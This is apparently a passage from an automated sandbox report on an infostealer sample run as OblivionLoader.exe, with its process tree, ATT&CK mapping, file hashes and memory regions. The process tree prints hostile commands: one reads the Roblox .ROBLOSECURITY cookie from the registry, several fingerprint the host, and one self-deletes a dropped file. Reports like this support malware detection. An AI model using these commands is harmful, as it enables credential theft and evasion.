- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5108
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    PID:2452
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:4428
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:4812
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2260
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:4724
- - C:\Windows\SYSTEM32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\wininit.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:2212
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:4400
- C:\Users\Admin\AppData\Local\Temp\OblivionLoader.exe
  "C:\Users\Admin\AppData\Local\Temp\OblivionLoader.exe"
  2⤵
  - Executes dropped EXE
  PID:4836

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:884

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:1624

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2544

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d28a889fd956d5cb3accfbaf1143eb6f

SHA1
157ba54b365341f8ff06707d996b3635da8446f7

SHA256
21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45

SHA512
0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
c9b6705519e1eef08f86c4ba5f4286f3

SHA1
6c6b179e452ecee2673a1d4fe128f1c06f70577f

SHA256
0f9cad44a79126871580e19b01dc3f880c5173b1faaf8b9018d5d1f829714705

SHA512
6d8f85a7a8b0b124530f36a157cd0441b5c1eacdc35e274af9fbf0569d03d1d5e468651a5b2425f0215c282ecfa7b1ffeaeeaf18612822f00bd14306d30640c7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
e86a2f4d6dec82df96431112380a87e6

SHA1
2dc61fae82770528bee4fe5733a8ac3396012e79

SHA256
dde11341854008e550d48a18f4880f7e462f5a75f0a6f8c09cf7b0761a425f3a

SHA512
5f127e7c81c480ad134eacfda3f5de738902b879fd4e85ddc663c050c6db748ac3f9d228ca26ddb37df06039df6741d2b774c0201388edf332fe063c464397a5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
acc3e03dd5912e5c06d640ac5eb783c8

SHA1
da71180f20a309222e86f563845df730f5419d20

SHA256
a7f70864938f7b88635a3b8bd4191e8fdf5458143d57948ad18a6fde7a1a2b45

SHA512
40bf08605fb211e2a4f13ba019d9fc8d6ce5696cdb78cc67610553555c17b9fff7a51e3fc69b480901fc9f6a5f1a0834d8901cd72693ccfc4073a9029183df8b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
3ce23b5ebf13dd339f71afed8555e421

SHA1
0732e1894df00da1a8a8ce24a9476fb43e2ddbe5

SHA256
10975d31c9009dd64dad99859e7a4b9aa118f0ddef1420afe6ed4cae1ef28149

SHA512
c838188df147ec91190576e8405c61ec7cfb912c84c9f731e2bedfddc99a2794e9b3e9852c13fbbd799fa9e019e83f0bbc9f538d103980906f164de6a993e339

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
34f595487e6bfd1d11c7de88ee50356a

SHA1
4caad088c15766cc0fa1f42009260e9a02f953bb

SHA256
0f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d

SHA512
10976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\OblivionLoader.exe

Filesize
3.3MB

MD5
fd80fb2330bab1bf16540543585b392e

SHA1
7214d0bf0561b3d571c26f495a3e2eccf5038557

SHA256
07a727c8555a5f5ed8bbd72a8c3afde5e1570fe9d4b383009a71fafec692f567

SHA512
b13d6c668871849264a2419d1cc6c95d98e4aad93a38c72dc48b92f72f099577e3fdc69b648aa00b355c140e7d3cb53947c36c849453885aacd4a0731ce265f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESD30F.tmp

Filesize
1KB

MD5
06d50dcee69d63886f07735fadde789b

SHA1
dd09559185f58ce85459c3b75b71b9c14318ec28

SHA256
27ce63e9e5fe829994b5c560ab02d9c34b3d8be4a1804d927808f35f7e2e1eec

SHA512
6d3a556ee3efe3d1e715971e461553d630e765163100cf7c98d28215a1cc7c56f529485fd6d3af716eb38a8b52b81588064ac4cd2e23a5b4db91f55a8ca3dfd6

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yl2sdle2.bsh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss.exe

Filesize
37.2MB

MD5
26a7e5a17d53f8709cfc9ebd583459a7

SHA1
b3090549b8ccf277612b568a4e5f6177ab5334c6

SHA256
b75157e6d824a7df8a05622d200c801f35ff53b6022fab575355d099220aa4d2

SHA512
0bf643adcfd5318d88a20785a31aca0219c21ae81c388405ee9f4adfe59cfcf88a436264c8d1724988c614fa945bd2d2a99ec151d1b9601b1c8a0bab9a333106

Download Submit
C:\Users\Admin\AppData\Local\Temp\gbZtWAPgko.ps1

Filesize
380B

MD5
cbb9a56c9c8d7c3494b508934ace0b98

SHA1
e76539db673cc1751864166494d4d3d1761cb117

SHA256
027703af742d779f4dcde399ac49a3334f1b9e51b199215203e1f4b5e3251fe5

SHA512
f71e0a521c2b0aa034e0a2c9f0efd7d813d8408d118979f8e05ecd3aa6fb94c67793e2302ed9455aad9a63d43a53fa1ac2b3d45f7bdfa1cc8104c9a9ace84129

Download Submit
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

Filesize
1.8MB

MD5
66a65322c9d362a23cf3d3f7735d5430

SHA1
ed59f3e4b0b16b759b866ef7293d26a1512b952e

SHA256
f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c

SHA512
0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

Download Submit
C:\Users\Admin\AppData\Local\Temp\python-installer.exe

Filesize
25.3MB

MD5
d8548aa7609a762ba66f62eeb2ca862d

SHA1
2eb85b73cab52693d3a27446b7de1c300cc05655

SHA256
5914748e6580e70bedeb7c537a0832b3071de9e09a2e4e7e3d28060616045e0a

SHA512
37fa7250b10b0c03b87d800bf4f920589649309cb4fbd25864475084bb7873d62b809a4fdeabd06c79f03f33614218eb7e01a9bd796de29dd3b141f1906d588c

Download Submit
C:\Users\Admin\AppData\Local\Temp\rfxky5tc\rfxky5tc.dll

Filesize
3KB

MD5
c13860ac5e931e3bbf523fa16f94a673

SHA1
0297e994c791e3157645ecff5e4b11690dc70518

SHA256
27710e85b43242fef8b3f24d5baa58ec755dbdbda881ba94bee4999262fe5e7c

SHA512
19040911fded4e12f52cfdcf5c3871c40a8c09546bddf5e993201dd45a67f315ecfe0c303f7cbcfc34b9a4de55f982dd5d90611e548b7023ae907dd63547b7dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\wininit.exe

Filesize
230KB

MD5
5e48a4e58fa2e9584c5a3b37dff630a3

SHA1
6f28ff8b9ca467eb80306abc46f63677bfcc0e56

SHA256
5088ab958c58c4cea16918464ae7a90d0a75a3f1d92acd5d52bdad80a95e61a8

SHA512
88c3ada9f8b6ae43c0e1736924f86081cb3358a8ec5db712acd7133588f158495533e8fa0fb83143c092942eabd0ffc79017ee7621400f9c263e925b42181bea

Download Submit
C:\Windows\Temp\{53794AB2-5A0F-4D01-A7AB-09BB79E86D7A}\.cr\python-installer.exe

Filesize
858KB

MD5
931227a65a32cebf1c10a99655ad7bbd

SHA1
1b874fdef892a2af2501e1aaea3fcafb4b4b00c6

SHA256
1dcf770dc47264f7495a559f786a4428f3a97f9d81e4c466ec9a5636f5a1be6d

SHA512
0212b5adc6ee8893edf4b94272fdffe145f53fe31357a3e024543f434cdc022a915d76780c1103aa9948feca5f161cfae608f91f3c7a876569e91c05d690d507

Download Submit
C:\Windows\Temp\{EF3A7E63-A201-47FF-AFCA-6EE465BC04C3}\.ba\PythonBA.dll

Filesize
675KB

MD5
8c8e5a5ca0483abdc6ad6ef22c73b5d2

SHA1
9b7345ab1b60bb3fb37c9dc7f331155b4441e4dc

SHA256
edc6db3712eb4e1cd6988bc7b42c467ac6901148f3ee4bdfb286eff26efbfd43

SHA512
861ad726872b58e5b8b7c580b485e7bde0be6c1963ac23db63d4105684d1e50e8f409cd329f183d252a52e2be2737efaf9e4413eff29deee75b87850664b3157

Download Submit
C:\Windows\Temp\{EF3A7E63-A201-47FF-AFCA-6EE465BC04C3}\.ba\SideBar.png

Filesize
50KB

MD5
888eb713a0095756252058c9727e088a

SHA1
c14f69f2bef6bc3e2162b4dd78e9df702d94cdb4

SHA256
79434bd1368f47f08acf6db66638531d386bf15166d78d9bfea4da164c079067

SHA512
7c59f4ada242b19c2299b6789a65a1f34565fed78730c22c904db16a9872fe6a07035c6d46a64ee94501fbcd96de586a8a5303ca22f33da357d455c014820ca0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rfxky5tc\CSCAF8DB2E5203B4EAE84DDA1B723F9BEE1.TMP

Filesize
652B

MD5
728e1e8fce36954f7118988970781c86

SHA1
e679186abda41c2b5af89812c455ea228eb57dd1

SHA256
4a8256d1f654e8812f2500794f564090e7927ddd0e72e6690a85f3c3ab58ec4e

SHA512
6d5dda9a1905f5eefc92ca2eb51529c88e7396c6a08fbce13ed92abde08629a0ad14f38580d08dc9022140d879ef80a472f381b6a47e062bd6a6b3be51415c6e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rfxky5tc\rfxky5tc.0.cs

Filesize
312B

MD5
ecbf151f81ff98f7dff196304a40239e

SHA1
ccf6b97b6f8276656b042d64f0595963fe9ec79c

SHA256
295ca195631c485c876e7c468ddcbb3fe7cd219d3e5005a2441be2de54e62ac8

SHA512
4526a59055a18af6c0c13fb9f55a9a9bc15aa1407b697849e19b6cc32c88ee7206b3efff806bd154d36bce144ae1d9c407c6ea0f5077c54fbe92cd172c203720

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\rfxky5tc\rfxky5tc.cmdline

Filesize
369B

MD5
c314806067b0419ae1314dcd5df812ce

SHA1
ffbeb22e5cefd002c88330a34d73b06c362cf324

SHA256
e2c0848b1f169967ad2d32f39366abb2e2ab9e153c86e4dfede08748acedb4d9

SHA512
f3fa67fd217cec976d0dff68d440d4246789b07aa2f72864d3f73ee9d6391c2e30cb36dbfa412ff3b49a00da97f653b43a9539616597eb49b47430518fb9f447

Download Submit
memory/2544-51-0x00000000062F0000-0x000000000633C000-memory.dmp

Filesize
304KB

Download
memory/2544-32-0x0000000005770000-0x00000000057D6000-memory.dmp

Filesize
408KB

Download
memory/2544-149-0x0000000007180000-0x000000000718A000-memory.dmp

Filesize
40KB

Download
memory/2544-138-0x00000000070F0000-0x000000000710A000-memory.dmp

Filesize
104KB

Download
memory/2544-153-0x0000000007380000-0x0000000007416000-memory.dmp

Filesize
600KB

Download
memory/2544-0-0x00000000732DE000-0x00000000732DF000-memory.dmp

Filesize
4KB

Download
memory/2544-157-0x0000000007300000-0x0000000007311000-memory.dmp

Filesize
68KB

Download
memory/2544-50-0x0000000005DE0000-0x0000000005DFE000-memory.dmp

Filesize
120KB

Download
memory/2544-121-0x00000000063A0000-0x00000000063D2000-memory.dmp

Filesize
200KB

Download
memory/2544-1-0x0000000002810000-0x0000000002846000-memory.dmp

Filesize
216KB

Download
memory/2544-132-0x00000000063E0000-0x00000000063FE000-memory.dmp

Filesize
120KB

Download
memory/2544-122-0x0000000074EA0000-0x0000000074EEC000-memory.dmp

Filesize
304KB

Download
memory/2544-178-0x0000000007340000-0x000000000734E000-memory.dmp

Filesize
56KB

Download
memory/2544-197-0x00000000732D0000-0x0000000073A80000-memory.dmp

Filesize
7.7MB

Download
memory/2544-180-0x0000000007440000-0x000000000745A000-memory.dmp

Filesize
104KB

Download
memory/2544-181-0x0000000007420000-0x0000000007428000-memory.dmp

Filesize
32KB

Download
memory/2544-137-0x00000000077A0000-0x0000000007E1A000-memory.dmp

Filesize
6.5MB

Download
memory/2544-133-0x0000000006DE0000-0x0000000006E83000-memory.dmp

Filesize
652KB

Download
memory/2544-179-0x0000000007350000-0x0000000007364000-memory.dmp

Filesize
80KB

Download
memory/2544-47-0x00000000057E0000-0x0000000005B34000-memory.dmp

Filesize
3.3MB

Download
memory/2544-10-0x00000000732D0000-0x0000000073A80000-memory.dmp

Filesize
7.7MB

Download
memory/2544-12-0x00000000732D0000-0x0000000073A80000-memory.dmp

Filesize
7.7MB

Download
memory/2544-11-0x0000000004FD0000-0x00000000055F8000-memory.dmp

Filesize
6.2MB

Download
memory/2544-27-0x0000000004E00000-0x0000000004E22000-memory.dmp

Filesize
136KB

Download
memory/2544-30-0x0000000005700000-0x0000000005766000-memory.dmp

Filesize
408KB

Download
memory/3640-297-0x000001D6CBFC0000-0x000001D6CBFD2000-memory.dmp

Filesize
72KB

Download
memory/3640-296-0x000001D6B3500000-0x000001D6B350A000-memory.dmp

Filesize
40KB

Download
memory/3640-28-0x000001D6B1840000-0x000001D6B1880000-memory.dmp

Filesize
256KB

Download
memory/3640-215-0x000001D6B34C0000-0x000001D6B34DE000-memory.dmp

Filesize
120KB

Download
memory/3640-204-0x000001D6CBE40000-0x000001D6CBE90000-memory.dmp

Filesize
320KB

Download
memory/3640-203-0x000001D6CC040000-0x000001D6CC0B6000-memory.dmp

Filesize
472KB

Download
memory/3952-148-0x00000231215B0000-0x00000231215D2000-memory.dmp

Filesize
136KB

Download
memory/3952-174-0x00000231215A0000-0x00000231215A8000-memory.dmp

Filesize
32KB

Download